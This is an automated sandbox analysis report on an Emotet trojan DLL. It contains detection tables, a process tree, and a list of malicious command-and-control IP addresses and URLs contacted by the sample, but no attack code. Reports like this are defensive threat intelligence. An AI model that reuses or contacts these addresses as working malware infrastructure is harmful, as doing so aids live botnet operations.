16->32         started        57 127.0.0.1 unknown unknown 18->57 59 192.168.2.1 unknown unknown 18->59 signatures6 process7 signatures8 36 rundll32.exe 21->36         started        75 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->75 38 rundll32.exe 26->38         started        40 conhost.exe 28->40         started        process9 process10 42 rundll32.exe 2 36->42         started        signatures11 77 Hides that the sample has been downloaded from the Internet (zone.identifier) 42->77 45 rundll32.exe 42->45         started        process12 process13 47 rundll32.exe 45->47         started        dnsIp14 61 45.138.98.34, 49757, 80 M247GB Germany 47->61 63 69.16.218.101, 49758, 8080 LIQUIDWEBUS United States 47->63 65 System process connects to network (likely due to code injection or exploit) 47->65 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      xxWrY2YG7s.dll35%VirustotalBrowse
                      xxWrY2YG7s.dll42%ReversingLabsWin32.Trojan.Emotet
                      xxWrY2YG7s.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.rundll32.exe.c20000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.5030000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.48d0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.47f0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.rundll32.exe.30f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.4ae0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.1500000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.2e20000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.5200000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.47c0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.4ee0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.5560000.22.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.5230000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.5530000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.1500000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.4ab0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                      5.2.rundll32.exe.5240000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.2f50000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.loaddll32.exe.2f50000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.4850000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.5430000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.rundll32.exe.30c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.4540000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.4d50000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.0.loaddll32.exe.2f50000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.rundll32.exe.50e0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.4610000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      11.2.rundll32.exe.4ad0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      5.2.rundll32.exe.51e0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.af0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.4820000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.4570000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.1500000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.2.loaddll32.exe.1500000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.0.loaddll32.exe.2f50000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.4660000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.b00000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.c10000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.regsvr32.exe.d60000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.5120000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.4f10000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.5400000.18.unpack100%AviraHEUR/AGEN.1145233Download File
                      5.2.rundll32.exe.50b0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.5150000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.rundll32.exe.4c30000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.1500000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.5590000.23.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.2f50000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.rundll32.exe.51b0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.4eb0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      3.2.rundll32.exe.4740000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.b50000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.4d80000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.4690000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.rundll32.exe.5210000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      2.2.regsvr32.exe.e60000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.ad0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.5000000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                      13.2.rundll32.exe.4f40000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.5500000.20.unpack100%AviraHEUR/AGEN.1145233Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://69.16.218.101/G0%Avira URL Cloudsafe
                      https://45.138.98.34/11%VirustotalBrowse
                      https://45.138.98.34/100%Avira URL Cloudmalware
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://45.138.98.34:80/agTEyDHCnXsPfzGXJQYZqenIQJ100%Avira URL Cloudmalware
                      https://dynamic.t0%URL Reputationsafe
                      https://45.138.98.34:80/agTEyDHCnXsPfzGXJQYZqenIQ100%Avira URL Cloudmalware
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://69.16.218.101/0%Avira URL Cloudsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                        high
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000028.00000003.562839006.0000020150783000.00000004.00000001.sdmp, svchost.exe, 00000028.00000003.562986646.0000020150C02000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://69.16.218.101/Grundll32.exe, 0000000D.00000002.776922125.0000000002E84000.00000004.00000020.sdmp, rundll32.exe, 0000000D.00000003.301116339.0000000002E84000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000013.00000003.311534393.0000027A38456000.00000004.00000001.sdmpfalse
                          high
                          https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000013.00000002.312150390.0000027A3843D000.00000004.00000001.sdmpfalse
                            high
                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                              high
                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000013.00000002.312150390.0000027A3843D000.00000004.00000001.sdmpfalse
                                high
                                https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.312198397.0000027A3845C000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000013.00000002.312229553.0000027A3846A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311394350.0000027A38468000.00000004.00000001.sdmpfalse
                                    high
                                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000013.00000002.312186482.0000027A3844F000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311447296.0000027A38448000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311592499.0000027A3844E000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000013.00000002.312150390.0000027A3843D000.00000004.00000001.sdmpfalse
                                        high
                                        https://45.138.98.34/rundll32.exe, 0000000D.00000003.301116339.0000000002E84000.00000004.00000001.sdmptrue
                                        • 11%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000013.00000003.311511119.0000027A38440000.00000004.00000001.sdmpfalse
                                          high
                                          https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                                            high
                                            http://crl.ver)svchost.exe, 00000009.00000002.603378937.0000019B31212000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.586862467.000002014FEEA000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311511119.0000027A38440000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.312198397.0000027A3845C000.00000004.00000001.sdmpfalse
                                              high
                                              http://upx.sf.netAmcache.hve.14.drfalse
                                                high
                                                https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000028.00000003.563954430.0000020150C02000.00000004.00000001.sdmp, svchost.exe, 00000028.00000003.563915691.0000020150796000.00000004.00000001.sdmp, svchost.exe, 00000028.00000003.563855715.0000020150796000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000013.00000002.312150390.0000027A3843D000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.312085484.0000027A38413000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000013.00000002.312164346.0000027A38442000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311511119.0000027A38440000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311547869.0000027A38441000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://%s.xboxlive.comsvchost.exe, 00000010.00000002.774390239.00000214CF244000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    low
                                                    https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000013.00000002.312186482.0000027A3844F000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311447296.0000027A38448000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311592499.0000027A3844E000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000013.00000003.311511119.0000027A38440000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000013.00000003.311511119.0000027A38440000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.312198397.0000027A3845C000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000028.00000003.562839006.0000020150783000.00000004.00000001.sdmp, svchost.exe, 00000028.00000003.562986646.0000020150C02000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.312198397.0000027A3845C000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000013.00000002.312164346.0000027A38442000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311511119.0000027A38440000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311547869.0000027A38441000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://45.138.98.34:80/agTEyDHCnXsPfzGXJQYZqenIQJrundll32.exe, 0000000D.00000002.776922125.0000000002E84000.00000004.00000020.sdmp, rundll32.exe, 0000000D.00000003.301116339.0000000002E84000.00000004.00000001.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://dynamic.tsvchost.exe, 00000013.00000002.312220921.0000027A38465000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://45.138.98.34:80/agTEyDHCnXsPfzGXJQYZqenIQrundll32.exe, 0000000D.00000002.776922125.0000000002E84000.00000004.00000020.sdmp, rundll32.exe, 0000000D.00000003.301116339.0000000002E84000.00000004.00000001.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://disneyplus.com/legal.svchost.exe, 00000028.00000003.562839006.0000020150783000.00000004.00000001.sdmp, svchost.exe, 00000028.00000003.562986646.0000020150C02000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000013.00000002.312178210.0000027A38445000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311511119.0000027A38440000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311569587.0000027A38444000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.311547869.0000027A38441000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.312198397.0000027A3845C000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://activity.windows.comsvchost.exe, 00000010.00000002.774390239.00000214CF244000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.bingmapsportal.comsvchost.exe, 00000013.00000002.312085484.0000027A38413000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000013.00000003.311438363.0000027A38461000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://help.disneyplus.com.svchost.exe, 00000028.00000003.562839006.0000020150783000.00000004.00000001.sdmp, svchost.exe, 00000028.00000003.562986646.0000020150C02000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://69.16.218.101/rundll32.exe, 0000000D.00000002.776922125.0000000002E84000.00000004.00000020.sdmp, rundll32.exe, 0000000D.00000003.301116339.0000000002E84000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000013.00000002.312150390.0000027A3843D000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://%s.dnet.xboxlive.comsvchost.exe, 00000010.00000002.774390239.00000214CF244000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      low
                                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.312198397.0000027A3845C000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000013.00000003.311483561.0000027A3845A000.00000004.00000001.sdmpfalse
                                                                                          high

                                                                                          Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          207.148.81.119
                                                                                          unknownUnited States
                                                                                          20473AS-CHOOPAUStrue
                                                                                          104.131.62.48
                                                                                          unknownUnited States
                                                                                          14061DIGITALOCEAN-ASNUStrue
                                                                                          85.214.67.203
                                                                                          unknownGermany
                                                                                          6724STRATOSTRATOAGDEtrue
                                                                                          191.252.103.16
                                                                                          unknownBrazil
                                                                                          27715LocawebServicosdeInternetSABRtrue
                                                                                          168.197.250.14
                                                                                          unknownArgentina
                                                                                          264776OmarAnselmoRipollTDCNETARtrue
                                                                                          66.42.57.149
                                                                                          unknownUnited States
                                                                                          20473AS-CHOOPAUStrue
                                                                                          185.148.168.15
                                                                                          unknownGermany
                                                                                          44780EVERSCALE-ASDEtrue
                                                                                          51.210.242.234
                                                                                          unknownFrance
                                                                                          16276OVHFRtrue
                                                                                          217.182.143.207
                                                                                          unknownFrance
                                                                                          16276OVHFRtrue
                                                                                          69.16.218.101
                                                                                          unknownUnited States
                                                                                          32244LIQUIDWEBUStrue
                                                                                          159.69.237.188
                                                                                          unknownGermany
                                                                                          24940HETZNER-ASDEtrue
                                                                                          45.138.98.34
                                                                                          unknownGermany
                                                                                          9009M247GBtrue
                                                                                          116.124.128.206
                                                                                          unknownKorea Republic of
                                                                                          9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                          78.46.73.125
                                                                                          unknownGermany
                                                                                          24940HETZNER-ASDEtrue
                                                                                          37.59.209.141
                                                                                          unknownFrance
                                                                                          16276OVHFRtrue
                                                                                          210.57.209.142
                                                                                          unknownIndonesia
                                                                                          38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                                                                                          185.148.168.220
                                                                                          unknownGermany
                                                                                          44780EVERSCALE-ASDEtrue
                                                                                          54.37.228.122
                                                                                          unknownFrance
                                                                                          16276OVHFRtrue
                                                                                          190.90.233.66
                                                                                          unknownColombia
                                                                                          18678INTERNEXASAESPCOtrue
                                                                                          142.4.219.173
                                                                                          unknownCanada
                                                                                          16276OVHFRtrue
                                                                                          54.38.242.185
                                                                                          unknownFrance
                                                                                          16276OVHFRtrue
                                                                                          195.154.146.35
                                                                                          unknownFrance
                                                                                          12876OnlineSASFRtrue
                                                                                          195.77.239.39
                                                                                          unknownSpain
                                                                                          60493FICOSA-ASEStrue
                                                                                          78.47.204.80
                                                                                          unknownGermany
                                                                                          24940HETZNER-ASDEtrue
                                                                                          37.44.244.177
                                                                                          unknownGermany
                                                                                          47583AS-HOSTINGERLTtrue
                                                                                          62.171.178.147
                                                                                          unknownUnited Kingdom
                                                                                          51167CONTABODEtrue
                                                                                          128.199.192.135
                                                                                          unknownUnited Kingdom
                                                                                          14061DIGITALOCEAN-ASNUStrue

                                                                                          Private

                                                                                          IP
                                                                                          192.168.2.1
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                          Analysis ID:553140
                                                                                          Start date:14.01.2022
                                                                                          Start time:11:24:25
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 14m 43s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Sample file name:xxWrY2YG7s (renamed file extension from none to dll)
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:42
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.evad.winDLL@41/23@0/29
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 39.1% (good quality ratio 37.7%)
                                                                                          • Quality average: 78.4%
                                                                                          • Quality standard deviation: 25%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 82%
                                                                                          • Number of executed functions: 38
                                                                                          • Number of non-executed functions: 214
                                                                                          Cookbook Comments:
                                                                                          • Adjust boot time
                                                                                          • Enable AMSI
                                                                                          • Override analysis time to 240s for rundll32
                                                                                          Warnings:
                                                                                          Show All
                                                                                          • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 173.222.108.226, 173.222.108.210, 104.208.16.94, 20.54.110.249, 40.91.112.76
                                                                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          11:25:31API Interceptor10x Sleep call for process: svchost.exe modified
                                                                                          11:25:56API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                          11:26:48API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          207.148.81.1197MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                            vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                              M2hsMd9hTq.dllGet hashmaliciousBrowse
                                                                                                wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                  8ozP45Xn3V.dllGet hashmaliciousBrowse
                                                                                                    pugKLanrj3.dllGet hashmaliciousBrowse
                                                                                                      CSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                        nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                          bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                            vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                              wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                                SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                                                                  qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                                                                    EtUNsUHRzq.dllGet hashmaliciousBrowse
                                                                                                                      PyqpE3VUI3.dllGet hashmaliciousBrowse
                                                                                                                        SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                                                                                                          P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                                            SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                                                                                                              P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                                                TkXWcfci7G.dllGet hashmaliciousBrowse
                                                                                                                                  104.131.62.487MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                                                                    vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                                                      M2hsMd9hTq.dllGet hashmaliciousBrowse
                                                                                                                                        wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                                                          8ozP45Xn3V.dllGet hashmaliciousBrowse
                                                                                                                                            pugKLanrj3.dllGet hashmaliciousBrowse
                                                                                                                                              CSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                                                                nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                                                                  bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                                                                    vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                                                                      wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                                                                        SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                                                                                                          qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                                                                                                            EtUNsUHRzq.dllGet hashmaliciousBrowse
                                                                                                                                                              PyqpE3VUI3.dllGet hashmaliciousBrowse
                                                                                                                                                                SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                                                                                    SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                                                                                        TkXWcfci7G.dllGet hashmaliciousBrowse

                                                                                                                                                                          Domains

                                                                                                                                                                          No context

                                                                                                                                                                          ASN

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                          AS-CHOOPAUS7MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          M2hsMd9hTq.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          8ozP45Xn3V.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          pugKLanrj3.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
